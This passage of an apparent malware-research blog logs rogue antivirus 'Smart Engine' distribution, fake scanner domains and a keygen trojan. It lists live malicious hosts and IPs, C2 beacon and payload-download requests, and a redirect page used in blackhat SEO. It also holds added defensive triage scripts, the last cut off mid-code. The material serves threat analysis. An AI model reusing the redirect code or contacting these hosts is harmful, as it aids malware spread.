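    """Split the capture into blank-line-separated blocks and parse each one."""
    requests: list[Request] = []
    for block in re.split(r"\n\s*\n", log.strip()):
        lines = [ln.strip() for ln in block.splitlines() if ln.strip()]
        m = re.match(r"^(GET|POST)\s+(\S+)\s+HTTP/1\.[01]$", lines[0])
        if not m:
            continue  # not a request block; skip it
        req = Request(method=m.group(1), path=m.group(2))
        for line in lines[1:]:
            name, _, value = line.partition(":")
            name, value = name.strip().lower(), value.strip()
            if name == "host":
                req.host = refang(value)
            elif name == "user-agent":
                req.user_agent = value
            elif name == "referer":
                req.referer = value
        req.flags = flag_request(req)
        requests.append(req)
    return requests


def blocklist_hosts(log: str) -> list[str]:
    """Unique, re-fanged hosts from the capture, ready for a blocklist."""
    return sorted({r.host for r in parse_requests(log) if r.host})


def flagged_requests(log: str) -> list[Request]:
    return [r for r in parse_requests(log) if r.flags]


if __name__ == "__main__":
    for r in flagged_requests(SAMPLE_LOG):
        print(f"{r.method} {r.host}{r.path}  ->  {', '.join(r.flags)}")
```

The flags are hints for triage, not verdicts: a POST to a .gif path or a "Mozilla/6.0" agent is not proof of malware on its own, but several of them on one host in a sandbox capture is a good reason to add the host to the blocklist that blocklist_hosts() produces.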

URLVoid domain analysis:

http://www.urlvoid.com/scan/simplycomics.in
http://www.urlvoid.com/scan/greatwebdata.in
http://www.urlvoid.com/scan/droolbuy.in
http://www.urlvoid.com/scan/migented.in
http://www.urlvoid.com/scan/cnscut.cn
http://www.ipvoid.com/scan/91.206.200.242
http://www.ipvoid.com/scan/80.13.172.136
http://www.urlvoid.com/scan/toxtb.info
http://www.urlvoid.com/scan/rvvxe.info
http://www.urlvoid.com/scan/qvnok.info
http://www.urlvoid.com/scan/ucfya.info
http://www.urlvoid.com/scan/nxmtv.info
http://www.urlvoid.com/scan/ddk100.com
http://www.urlvoid.com/scan/susimumezez.com
http://www.urlvoid.com/scan/udjng.info
http://www.urlvoid.com/scan/hawfruit.com
http://www.urlvoid.com/scan/mattfoy.com
http://www.urlvoid.com/scan/hslibrary.com
http://www.urlvoid.com/scan/utling.com
http://www.urlvoid.com/scan/topsaj.com
http://www.urlvoid.com/scan/thevehic.com
http://www.urlvoid.com/scan/qvnok.info
http://www.urlvoid.com/scan/m28m.in
http://www.urlvoid.com/scan/thevehic.com

Recent malicious URLs analyzed #2

Report of the logged malicious URLs:

POST /msql.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Host: www.adamplus. com
 
GET /coldman.bin HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.lostyear. ru
 
GET /czl/zlo.cl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: casualhopperois. com
 
POST /zumboo.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.lameedge. ru
 
GET /files/454483969/usb.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: rapidshare. com
 
GET /files/454483969/usb.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: rs851tl2.rapidshare. com
 
GET /exe/4910b18a623c549e2e1bc53f6cc0682a4579fbf6/setup.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: get.zdropp.co. cc
 
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: image4msn. com
 
GET /install.48208.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: efirst-data. in
 
POST /djcash.php?ini=XXX HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: talkwire. in
 
GET /download.php?token=4910b18a623c549e2e1bc53f6cc0682a4579fbf6 HTTP/1.0
User-Agent: NSIS_Inetc (Mozilla)
Host: 5630.zdropp.co. cc
 
POST /trackstats.php HTTP/1.0
User-Agent: NSIS_Inetc (Mozilla)
Host: 6199.zdropp.co. cc
 
POST /application.php HTTP/1.0
User-Agent: NSIS_Inetc (Mozilla)
Host: 6199.zdropp.co. cc
 
GET /download.php?bundle=1 HTTP/1.0
User-Agent: NSIS_Inetc (Mozilla)
Host: s6199.wdropp.co. cc
 
GET /list.php?c=XXX&v=2&t=0,2486841 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2900.2096; Windows NT 5.1.2600)
Host: justoldleft. ru
 
GET /tm/crypt.exe?t=0,6011011 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2900.2096; Windows NT 5.1.2600)
Host: www.derquda. com
 
GET /sn.php?c=XXX&t=0,8542902 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2900.2096; Windows NT 5.1.2600)
Host: justoldleft. ru

URLVoid domain analysis:

http://www.urlvoid.com/scan/justoldleft.ru
http://www.urlvoid.com/scan/derquda.com
http://www.urlvoid.com/scan/s6199.wdropp.co.cc
http://www.urlvoid.com/scan/wdropp.co.cc
http://www.urlvoid.com/scan/6199.zdropp.co.cc
http://www.urlvoid.com/scan/zdropp.co.cc
http://www.urlvoid.com/scan/5630.zdropp.co.cc
http://www.urlvoid.com/scan/talkwire.in
http://www.urlvoid.com/scan/efirst-data.in
http://www.urlvoid.com/scan/image4msn.com
http://www.urlvoid.com/scan/get.zdropp.co.cc
http://www.urlvoid.com/scan/rs851tl2.rapidshare.com
http://www.urlvoid.com/scan/lameedge.ru
http://www.urlvoid.com/scan/casualhopperois.com
http://www.urlvoid.com/scan/adamplus.com
http://www.urlvoid.com/scan/lostyear.ru

Recent Websites Associated with Fake Scanner Pages

Domains associated with recent fake scanner pages. They are used to distribute the setup files of rogue security software and to deliver web exploits and hidden redirections to dangerous websites, all of it related to rogue software distribution.

nvrsewep.co. cc – 78.26.179.6
svrwvrtep.co. cc – 78.26.179.6
puwibryj.co. cc – 78.26.179.6
wofycof.co. cc – 78.26.179.6
xysihibr.co. cc – 78.26.179.6
zununuj.co. cc – 78.26.179.6
brilerzit.co. cc – 78.26.179.6
gvrlynerf.co. cc – 78.26.179.6
sekvrfig.co. cc – 78.26.179.6
www3.saveguardin4u. in – 65.23.153.126
saveguardin4u. in – –
www3.bestcleansentinel. in – –
bestcleansentinel. in – –
www1.hardsuitescanner. in – 173.192.68.246
hardsuitescanner. in – –
www2.strong-power-army. in – 83.133.124.177
strong-power-army. in – –
www3.safe-suiteholder. com – –
safe-suiteholder. com – –
www3.smartantivirforu. com – –
smartantivirforu. com – –
www3.top-pckeeper. com – –
top-pckeeper. com – –
www4.safe-zoneng. net – –
safe-zoneng. net – –
www1.chckeck. in – –
chckeck. in – –
www1.guardianaor. in – –
guardianaor. in – –
www1.opensoftscanav. com – –
opensoftscanav. com – –
www1.personal-scan-holder. in – –
personal-scan-holder. in – –
www1.profalsave. in – –
profalsave. in – –
www2.firstguardin4u. com – –
firstguardin4u. com – –

Free download cracked software with surprise

We have logged another website used to capture software-related keywords and to spread the Renos trojan and other dangerous threats as executable files posing as software cracks and keygens. The website uses blackhat SEO strategies to attract as many users as possible and to appear on the first pages of search engine results.

Cracked Software Website

The file that is downloaded from the dangerous website is:

Downloaded File

Report 2010-10-28 02:11:21 (GMT 1)
File Name keygen-youtubeget-v5-8-youtube
File Size 180224 bytes
File Type Executable File (EXE)
MD5 Hash 435c56e76544772ae273a324066df2cc
SHA1 Hash 2df1627a8e6dd607ac79b8ed4d3d32ebbadc4bf5
Detections: 2 / 16 (13 %)
Status INFECTED

Report 2010-10-28 02:11:44 (GMT 1)
File Name keygen-youtubeget-v5-8-youtube
File Size 180224 bytes
File Type Executable File (EXE)
MD5 Hash 80044a9b4867e9e45a465a5628de795f
SHA1 Hash 597ff8fd30eddd9b985fd26fff235277e585e81e
Detections: 2 / 16 (13 %)
Status INFECTED

Report 2010-10-28 02:15:17 (GMT 1)
File Name keygen-youtubeget-v5-8-youtube
File Size 180224 bytes
File Type Executable File (EXE)
MD5 Hash 798c460f8a7af4a54f863ff68fec064a
SHA1 Hash 78d20e58b107111ca552d65137a65335375bd012
Detections: 2 / 16 (13 %)
Status INFECTED

Report 2010-10-28 02:15:39 (GMT 1)
File Name keygen-youtubeget-v5-8-youtube
File Size 180224 bytes
File Type Executable File (EXE)
MD5 Hash 1ec2315af5929d0462fc9c5dd1e6aaf1
SHA1 Hash d72d642b5f4a6e11766b274f64d2263263fd58ee
Detections: 2 / 16 (13 %)
Status INFECTED

An interesting thing is that every time we tried to download the infected file, it had a different MD5 checksum. This means the payload is most probably created on the fly, or there are various executable versions of the malware stored on the server that are served at random. Possibly this is done to make sure the website always distributes an up-to-date malware executable that is not yet detected by security software.
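The four reports above are the evidence for that observation: one file name, one size (180224 bytes), four different MD5/SHA1 pairs within four minutes. For a defender the practical consequence is that a hash-based blocklist built from a single download of this site will miss the next download, so the indicators to pivot on are the URL, the file name and the constant size rather than the hashes. The script below is an added example, not code from NoVirusThanks; it parses report blocks in the format shown above, groups them by name and size, and reports a cluster as polymorphic when every download in it hashed differently. The sample is constructed from the four reports above verbatim.

```python
from __future__ import annotations

import re
from collections import defaultdict

# Constructed from the four scanner reports above: one file name and size,
# four different MD5/SHA1 pairs.
SAMPLE_REPORTS = """
Report 2010-10-28 02:11:21 (GMT 1)
File Name keygen-youtubeget-v5-8-youtube
File Size 180224 bytes
File Type Executable File (EXE)
MD5 Hash 435c56e76544772ae273a324066df2cc
SHA1 Hash 2df1627a8e6dd607ac79b8ed4d3d32ebbadc4bf5
Detections: 2 / 16 (13 %)
Status INFECTED

Report 2010-10-28 02:11:44 (GMT 1)
File Name keygen-youtubeget-v5-8-youtube
File Size 180224 bytes
File Type Executable File (EXE)
MD5 Hash 80044a9b4867e9e45a465a5628de795f
SHA1 Hash 597ff8fd30eddd9b985fd26fff235277e585e81e
Detections: 2 / 16 (13 %)
Status INFECTED

Report 2010-10-28 02:15:17 (GMT 1)
File Name keygen-youtubeget-v5-8-youtube
File Size 180224 bytes
File Type Executable File (EXE)
MD5 Hash 798c460f8a7af4a54f863ff68fec064a
SHA1 Hash 78d20e58b107111ca552d65137a65335375bd012
Detections: 2 / 16 (13 %)
Status INFECTED

Report 2010-10-28 02:15:39 (GMT 1)
File Name keygen-youtubeget-v5-8-youtube
File Size 180224 bytes
File Type Executable File (EXE)
MD5 Hash 1ec2315af5929d0462fc9c5dd1e6aaf1
SHA1 Hash d72d642b5f4a6e11766b274f64d2263263fd58ee
Detections: 2 / 16 (13 %)
Status INFECTED
"""

# One regex per field of the report layout shown on the page.
FIELDS = {
    "time": re.compile(r"^Report\s+(\S+\s+\S+)"),
    "name": re.compile(r"^File Name\s+(.+)$"),
    "size": re.compile(r"^File Size\s+(\d+)\s+bytes"),
    "md5": re.compile(r"^MD5 Hash\s+([0-9a-fA-F]{32})$"),
    "sha1": re.compile(r"^SHA1 Hash\s+([0-9a-fA-F]{40})$"),
    "detections": re.compile(r"^Detections:\s+(\d+)\s*/\s*(\d+)"),
}


def parse_reports(text: str) -> list[dict]:
    """Turn blank-line-separated report blocks into dicts; incomplete blocks are dropped."""
    reports: list[dict] = []
    for block in re.split(r"\n\s*\n", text.strip()):
        rec: dict = {}
        for line in block.splitlines():
            line = line.strip()
            for key, rx in FIELDS.items():
                m = rx.match(line)
                if not m:
                    continue
                if key == "size":
                    rec[key] = int(m.group(1))
                elif key == "detections":
                    rec[key] = (int(m.group(1)), int(m.group(2)))
                elif key in ("md5", "sha1"):
                    rec[key] = m.group(1).lower()
                else:
                    rec[key] = m.group(1).strip()
        if {"name", "size", "md5", "sha1"} <= rec.keys():
            reports.append(rec)
    return reports


def cluster_samples(reports: list[dict]) -> list[dict]:
    """Group downloads by (name, size) and decide whether the server repacks per download."""
    groups: dict[tuple[str, int], list[dict]] = defaultdict(list)
    for r in reports:
        groups[(r["name"], r["size"])].append(r)
    clusters = []
    for (name, size), recs in groups.items():
        md5s = sorted({r["md5"] for r in recs})
        sha1s = sorted({r["sha1"] for r in recs})
        ratios = [d / t for d, t in (r.get("detections", (0, 1)) for r in recs)]
        clusters.append({
            "name": name,
            "size": size,
            "downloads": len(recs),
            "md5": md5s,
            "sha1": sha1s,
            # every download hashed differently while the size stayed constant
            "polymorphic": len(recs) > 1 and len(sha1s) == len(recs),
            "best_detection": max(ratios),
        })
    return clusters


if __name__ == "__main__":
    for c in cluster_samples(parse_reports(SAMPLE_REPORTS)):
        print(f"{c['name']} ({c['size']} bytes): {c['downloads']} downloads, "
              f"{len(c['sha1'])} distinct SHA1s, polymorphic={c['polymorphic']}")
```

A cluster marked polymorphic should be blocked by its download URL and matched on behaviour or size rather than on the hash list, which only grows with every visit to the site.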

During the analysis, the following files have been created in our system:

Created Files

Suspicious DNS queries:

megadataonline .net
mydynatri .net
zoozus .com
threezio .com
sina.com .cn
waytoall .com
topdworld .com
thevehic .com
ad.tlvmedia .com

Network traffic:

POST /muchahos.php?ini=XXX HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: megadataonline .net
 
POST /logos/bd305e793bda3beeb28218754d729da6f334759cdd06b5446bb70c4cc2842087c284f404583eee08b/0485038023a/logo.gif HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: mydynatri .net
 
POST /werber/94653350334/217.gif HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: zoozus .com
 
POST /perce/fd103eb9fbba9bfe524268857d427d06236465cccda62504eb372cece2b4b0e7c2e4a4b4984ebef88/1475f360f30/qwerce.gif HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: threezio .com
 
POST /borders.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: waytoall .com
 
POST /1wave.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: topdworld .com
 
GET /2wave.php?Yfe6r8FPBg1YhglTLRtwQVy4qRTSmZv0YN/d HTTP/1.1
Referer: hxxp://ovguide .com/
Host: thevehic .com
 
GET /st?ad_type=iframe&ad_size=120x600&section=1447253 HTTP/1.1
Referer: hxxp://thevehic .com/2wave.php?Yfe6r8FPBg1YhglTLRtwQVy4qRTSmZv0YN/d
Host: ad.tlvmedia .com

The malware appears to have sent, with the POST method, a lot of encrypted data to various website URLs, and at the end it received commands to visit some advertisement links.

Domain & IP Analysis:

sotapartners.net – 174.123.211.138 – AS: 21844
data-mortgage.com – 78.46.76.170 – AS: 24940
megadataonline.net – 64.191.16.70 – AS: 21788
mydynatri.net – 77.78.248.84 – AS: 42560
zoozus.com – 85.234.190.47 – AS: 6851
threezio.com – 77.78.239.42 – AS: 42560
waytoall.com – 96.9.157.39 – AS: 21788
topdworld.com – 173.212.250.130 – AS: 21788
thevehic.com – 173.212.245.243 – AS: 21788
ad.tlvmedia.com – 217.163.21.37 – AS: 42173

Other suspicious domains hosted on 64.191.16.70:

brodiero.com – 64.191.16.70 – AS: 21788
megadatacentral.net – 64.191.16.70 – AS: 21788
megadataonline.net – 64.191.16.70 – AS: 21788
spiderfile.net – 87.255.51.229 – AS: 38930

Other suspicious domains hosted on 85.234.190.47:

chattertune.net – 85.234.190.47 – AS: 6851
mybubblebean.com – – – AS: NA
roonotimex.com – 85.234.190.47 – AS: 6851

BlackHat SEO Campaign used to spread Smart Engine

A new blackhat SEO campaign is distributing the setup installer of a new rogue security software named Smart Engine. The spreading appears to be quite aggressive: we have logged more than 2000 infected websites that are used to capture popular keywords and to redirect users to malicious URLs or to other fake scanner pages, with the intent of installing the rogue software.

When a user clicks on an infected URL, there is a redirection:

<html>
<head>
<title></title>
<meta http-equiv="refresh" content="0; url=hxxp://www4.get-bestlink3 .co.cc/?30650ebe=XXX">
</head>
<body>
<script language="javascript">
self.location.href = "hxxp://www4.get-bestlink3 .co.cc/?30650ebe=XXX";
</script>
<a href="hxxp://www4.get-bestlink3 .co.cc/?30650ebe=XXX">Please Click Here</a>
</body>
</html>

Domain & IP Analysis:

www4.get-bestlink3 .co.cc
209.212.149.22 – ip-209.212.149.22.servernap.net

Another redirection:

HTTP/1.1 302 Moved Temporarily
Location: hxxp://www2.best-install10 .co.cc/?p=XXX

Domain & IP Analysis:

www2.best-install10 .co.cc
212.117.168.150 – ip-212-117-168-150.server.lu

And now we can see the fake scanner page:

Fake Scanner Page

After a short while the download of an executable is prompted:

Executable File Download

Location: hxxp://www2.doit-nowandfast .net/ejvlkn107_2211.php?p=XXX
HTTP/1.1 200 OK
Content-Type: application/octetstream
Pragma: hack
Content-Length: 270336
Content-Disposition: attachment; filename=packupdate107_2211.exe
Content-Transfer-Encoding: binary
Set-Cookie: ds=1

Domain & IP Analysis:

www2.doit-nowandfast .net
188.65.74.86 – –
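The steps above (hijacked page, meta/JavaScript redirect, 302 hop, fake scanner, executable drop) are a chain a triage script can reconstruct from the captures alone. The following is an added example, not code from this post or from NoVirusThanks: it extracts every redirect target from a landing page, follows `Location` headers, and flags the final response with a few assumed heuristics (executable attachment name, the non-hyphenated `application/octetstream` type and the odd `Pragma: hack` header, all visible in the capture). The sample bodies and headers are constructed from the captures quoted above and keep the post's defanging (`hxxp://`, a blank before the TLD), which the script undoes for comparison. The same landing-page form appears again in the 4DW4R3 post further down.

```python
# Added example (not code from the NoVirusThanks post): reconstruct the
# landing-page -> 302 -> installer chain from captured HTML and response
# headers, and flag the final drop. Samples are constructed from the
# captures quoted in the post; URLs stay defanged as in the post.
import re

def refang(url):
    """Undo the post's defanging: hxxp:// -> http://, 'host .tld' -> 'host.tld'."""
    url = re.sub(r"^hxxp(s?)://", r"http\1://", url.strip())
    return re.sub(r"\s+([./])", r"\1", url)

META_RE = re.compile(
    r'<meta\s+http-equiv=["\']refresh["\']\s+content=["\']\s*\d+\s*;\s*url=([^"\']+)["\']', re.I)
JS_RE = re.compile(
    r'(?:self|window|top|document)\.location(?:\.href)?\s*=\s*["\']([^"\']+)["\']', re.I)
HREF_RE = re.compile(r'<a\s+href=["\']([^"\']+)["\']', re.I)

def redirect_targets(html):
    """All redirect targets a landing page carries (meta refresh, JS, fallback link)."""
    found = {}
    for name, rx in (("meta_refresh", META_RE), ("javascript", JS_RE), ("anchor", HREF_RE)):
        m = rx.search(html)
        if m:
            found[name] = refang(m.group(1))
    return found

def parse_headers(raw):
    """Header lines of a captured response -> lowercase-name dict (status line skipped)."""
    headers = {}
    for line in raw.strip().splitlines():
        if ":" in line and not line.startswith("HTTP/"):
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers

EXEC_EXT = (".exe", ".scr", ".com", ".pif", ".bat", ".cmd")

def drop_indicators(headers):
    """Heuristics (assumed, not from the post) for an installer drop response."""
    hits = []
    m = re.search(r'filename="?([^";]+)', headers.get("content-disposition", ""), re.I)
    fname = m.group(1).strip() if m else ""
    if fname.lower().endswith(EXEC_EXT):
        hits.append("attachment is executable: " + fname)
    # the drop server sends 'octetstream' (no hyphen); accept both spellings
    if headers.get("content-type", "").replace("-", "") == "application/octetstream":
        hits.append("generic binary content-type")
    if headers.get("pragma", "").lower() == "hack":
        hits.append("non-standard 'Pragma: hack' header")
    return hits

def follow_chain(steps):
    """steps: [('html', body) | ('headers', raw)] in capture order.
    Returns (list of hop URLs, list of drop indicators)."""
    hops, indicators = [], []
    for kind, data in steps:
        if kind == "html":
            t = redirect_targets(data)
            if t:
                hops.append(t.get("meta_refresh") or t.get("javascript") or t.get("anchor"))
        else:
            h = parse_headers(data)
            if "location" in h:
                hops.append(refang(h["location"]))
            indicators.extend(drop_indicators(h))
    return hops, indicators

# Constructed samples modelled on the three captures quoted in the post.
LANDING = """<html><head><title></title>
<meta http-equiv="refresh" content="0; url=hxxp://www4.get-bestlink3 .co.cc/?30650ebe=XXX">
</head><body><script language="javascript">
self.location.href = "hxxp://www4.get-bestlink3 .co.cc/?30650ebe=XXX";
</script><a href="hxxp://www4.get-bestlink3 .co.cc/?30650ebe=XXX">Please Click Here</a></body></html>"""
HOP = "HTTP/1.1 302 Moved Temporarily\nLocation: hxxp://www2.best-install10 .co.cc/?p=XXX\n"
DROP = """Location: hxxp://www2.doit-nowandfast .net/ejvlkn107_2211.php?p=XXX
HTTP/1.1 200 OK
Content-Type: application/octetstream
Pragma: hack
Content-Length: 270336
Content-Disposition: attachment; filename=packupdate107_2211.exe
Content-Transfer-Encoding: binary
Set-Cookie: ds=1"""

if __name__ == "__main__":
    hops, hits = follow_chain([("html", LANDING), ("headers", HOP), ("headers", DROP)])
    print(" -> ".join(hops))
    print(hits)
```

The three redirect mechanisms are checked separately on purpose: a page where the meta refresh, the script and the link disagree is itself worth a look, and a sandbox with scripting disabled still lands on the anchor.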

The downloaded file is the installer of the Smart Engine rogue security software:

Smart Engine Installer

Main GUI of Smart Engine:

Smart Engine GUI

The Smart Engine main executable tries to connect to a remote host:

Windows Firewall Alert

GET /index.php?0d40b0=mNjf0tXm1J2a0du01sLl35A%3D HTTP/1.0
Host: update1.liwnarwlentoristorg910 .net
 
GET /?0d40b0=XXX HTTP/1.0
Host: report1.liwnarwlentoristorg910 .net

DNS Queries:

www5.smart-engine .net
secure1.buy-the-guardian .com

Domain & IP Analysis:

update1.liwnarwlentoristorg910 .net
188.65.74.83 – –
report1.liwnarwlentoristorg910 .net
209.222.8.102 – 209.222.8.102.choopa.net

Activation page:

Smart Engine Activation Page

GET /?kp=kdTHxeevuH5zneDK4eiso1Pk28WhmJI%3D HTTP/1.1
Host: secure1.wlentor-traden-quzonk-1 .com

Domain & IP Analysis:

secure1.wlentor-traden-quzonk-1 .com
69.57.173.219 – –

Smart Engine is sold for:

$49.95 -> 6 Month Guard Subscription
$69.95 -> 1 Year Guard Subscription
$89.95 -> Lifetime Guard Subscription

Network traffic:

HEAD / HTTP/1.1
Host: update1.wlentor-traden-quzonk-1 .com
 
HEAD / HTTP/1.1
Host: report1.wlentor-traden-quzonk-1 .com
 
HEAD / HTTP/1.1
Host: www5.wlentor-traden-quzonk-1 .com

Domain & IP Analysis:

update1.wlentor-traden-quzonk-1 .com
173.244.223.32 – 173.244.223.32.static.midphase.com
report1.wlentor-traden-quzonk-1 .com
173.244.223.37 – 173.244.223.37.static.midphase.com
www5.wlentor-traden-quzonk-1 .com
69.57.173.221 – –

The subdomain used for the activation page resolved to several different IPs during the analysis:

09/10/2010 14.32.58 # secure1.wlentor-traden-quzonk-1 .com # 209.212.149.23
09/10/2010 14.32.57 # secure1.wlentor-traden-quzonk-1 .com # 69.57.173.219

Network traffic:

GET /?xohmdu=XXX HTTP/1.1
Host: update1.wlentor-traden-quzonk-1 .com
Content-Type: application/octetstream
Pragma: hack
Content-Length: 1307
Content-Disposition: attachment; filename=04869.ini
Content-Transfer-Encoding: binary
 
GET /?pg=XXX HTTP/1.1
Host: report1.wlentor-traden-quzonk671 .com

Domain & IP Analysis:

report1.wlentor-traden-quzonk671 .com
174.36.42.71 – amu.furumoon.net

This subdomain also resolved to several different IPs during the analysis:

09/10/2010 14.33.04 # report1.wlentor-traden-quzonk671 .com # 174.36.42.71
09/10/2010 14.33.06 # report1.wlentor-traden-quzonk671 .com # 209.222.8.100
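The resolution log lines above (date, name, address separated by `#`) are exactly what a quick pivot needs: how many addresses a name moved across in how little time, and which other names sit in the same network. The script below is an added example, not part of the post: it parses that log format, flags names that answered with several distinct addresses inside a short window, and groups names by /24 so the "other suspicious domains hosted on" lists earlier in this page can be produced mechanically. The log is constructed from resolutions quoted in this post; the date is read as day/month/year, which is an assumption.

```python
# Added example (not part of the post): pivot a resolution log in the
# 'date time # hostname # ip' form shown above, by name (how many
# addresses a name moved across, and how fast) and by /24 (which other
# names share the hosting). Lines are constructed from resolutions quoted
# in this post; the date is read as day/month/year (assumed).
from collections import defaultdict
from datetime import datetime
import ipaddress

LOG = """\
09/10/2010 14.32.57 # secure1.wlentor-traden-quzonk-1 .com # 69.57.173.219
09/10/2010 14.32.58 # secure1.wlentor-traden-quzonk-1 .com # 209.212.149.23
09/10/2010 14.33.04 # report1.wlentor-traden-quzonk671 .com # 174.36.42.71
09/10/2010 14.33.06 # report1.wlentor-traden-quzonk671 .com # 209.222.8.100
09/10/2010 14.33.10 # secure.onlinesystempayment .com # 209.212.149.23
09/10/2010 14.33.12 # www4.get-bestlink3 .co.cc # 209.212.149.22
"""

def parse_log(text):
    """-> list of (datetime, hostname, ip_address); re-joins the defanged ' .tld'."""
    rows = []
    for line in text.splitlines():
        parts = [p.strip() for p in line.split("#")]
        if len(parts) != 3:
            continue                      # skip malformed lines instead of aborting
        ts = datetime.strptime(parts[0], "%d/%m/%Y %H.%M.%S")
        rows.append((ts, parts[1].replace(" .", "."), ipaddress.ip_address(parts[2])))
    return rows

def ips_per_host(rows):
    """hostname -> distinct addresses, in numeric order."""
    seen = defaultdict(set)
    for _, host, ip in rows:
        seen[host].add(ip)
    return {h: [str(i) for i in sorted(ips)] for h, ips in seen.items()}

def flux_candidates(rows, min_ips=2, window_seconds=60):
    """Names whose answers changed to >= min_ips distinct addresses inside one window."""
    by_host = defaultdict(list)
    for ts, host, ip in rows:
        by_host[host].append((ts, ip))
    flagged = {}
    for host, obs in by_host.items():
        obs.sort()
        for i, (ts, _) in enumerate(obs):
            in_window = {ip for ts2, ip in obs[i:] if (ts2 - ts).total_seconds() <= window_seconds}
            if len(in_window) >= min_ips:
                flagged[host] = len(in_window)
                break
    return flagged

def shared_infrastructure(rows, prefix=24):
    """/prefix network -> hostnames seen in it, keeping only networks shared by >1 name."""
    nets = defaultdict(set)
    for _, host, ip in rows:
        nets[str(ipaddress.ip_network(f"{ip}/{prefix}", strict=False))].add(host)
    return {n: sorted(h) for n, h in nets.items() if len(h) > 1}

if __name__ == "__main__":
    rows = parse_log(LOG)
    print(ips_per_host(rows))
    print(flux_candidates(rows))
    print(shared_infrastructure(rows))
```

On the constructed log the /24 pivot puts the activation host, the payment host and the first redirector in the same 209.212.149.0/24 block, which is the kind of link the per-domain "Domain & IP Analysis" lists make easy to miss.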

DNS Queries:

cilt442vyabkqqv.com (the raw capture shows the query name followed by a TXT answer)
TXT: v=spf1 a mx ip4:209.222.8.100/22 ?all

Note that the SPF range 209.222.8.0/22 covers the report1 addresses seen above (209.222.8.100 and 209.222.8.102).

The malware queried an external URL to learn our public IP address:

GET /get_ip.php?loc= HTTP/1.1
Host: www.myip .ru

After a short time we noticed a loop of connections:

HEAD / HTTP/1.1
User-Agent: Sm17a_2211
Host: 74.125.45.100
 
HEAD / HTTP/1.0
User-Agent: Sm17a_2211
Host: 74.125.45.100
 
HEAD / HTTP/1.0
User-Agent: Sm17a_2211
Host: 74.125.45.100

It appears to contact a Google IP address with HEAD requests to check whether the victim is online.

New domain used for payments, note the HTTPS:

Location: hxxps://secure.onlinesystempayment .com/?abbr=SME&price_name=6month&ext3=2211&ext1=MD5HASH&ext2=wvXP;b_IE6;107;11111;MainWindow;day;671;1;0&card=visa

Domain & IP Analysis:

secure.onlinesystempayment .com
209.212.149.23 – ip-209.212.149.23.servernap.net

New connection on port 443:

Remote Address    : 96.9.160.110
Remote Port       : 443
Service Name      : https

IP Analysis:

96.9.160.110 – 96-9-160-110.hostnoc.net

The malware also caused a request to a legitimate website related to SSL certificates. The User-Agent shows this is Windows CryptoAPI fetching the issuing CA certificate to build the chain for the HTTPS connection above, not code inside the malware itself:

GET /GLOBESSLDomainValidatedCA.crt HTTP/1.1
User-Agent: Microsoft-CryptoAPI/5.131.2600.2180
Host: crt.globessl.com

Files created during the installation of the rogue security software:

Files Created

Created desktop icon:

Desktop Icon

Smart Engine installed files:

Smart Engine Files

The hosts file has been modified and now has the +S (System) attribute set:

Hosts File System Attribute

Hosts file content:

Hosts File Content
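A modified hosts file with the System attribute set is a quick thing to check on a suspect box. The following is an added example, not from the post: it parses a hosts file, labels every non-stock entry by its effect, and reads the file attributes on Windows. Since the post shows the hosts content only as an image, the sample entries are constructed, and the blackholed/hijacked labelling is an assumed heuristic; 203.0.113.5 is a documentation address standing in for an attacker host.

```python
# Added example (not from the post): audit a Windows hosts file the way a
# responder would after an infection like this one. The post shows the
# file was altered and given the System (+S) attribute, but its content
# only as an image, so the entries below are constructed; 203.0.113.5 is
# a documentation address standing in for an attacker host.
import os
import stat

LOOPBACK = {"127.0.0.1", "::1", "0.0.0.0"}
LOCAL_NAMES = {"localhost", "localhost.localdomain", "broadcasthost"}

SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
127.0.0.1       www.virustotal.com        # constructed: vendor site blackholed
127.0.0.1       update.microsoft.com      # constructed
203.0.113.5     www.google.com            # constructed: search hijacked
"""

def parse_hosts(text):
    """(ip, hostname) pairs; comments, blank lines and extra aliases handled."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        ip, *names = line.split()
        entries.extend((ip, n.lower()) for n in names)
    return entries

def suspicious_entries(text):
    """Everything except the stock localhost lines, labelled by effect.
    Heuristic (assumed): loopback mapping = site blackholed, anything else = hijacked."""
    findings = []
    for ip, name in parse_hosts(text):
        if name in LOCAL_NAMES:
            continue
        findings.append(("blackholed" if ip in LOOPBACK else "hijacked", ip, name))
    return findings

def has_system_attribute(path):
    """True/False on Windows (FILE_ATTRIBUTE_SYSTEM), None where the stat field is absent."""
    attrs = getattr(os.stat(path), "st_file_attributes", None)
    if attrs is None:
        return None
    return bool(attrs & getattr(stat, "FILE_ATTRIBUTE_SYSTEM", 0x4))

def audit_hosts(path=r"C:\Windows\System32\drivers\etc\hosts"):
    """Attribute check plus entry review for the live file."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    return {"system_attribute": has_system_attribute(path),
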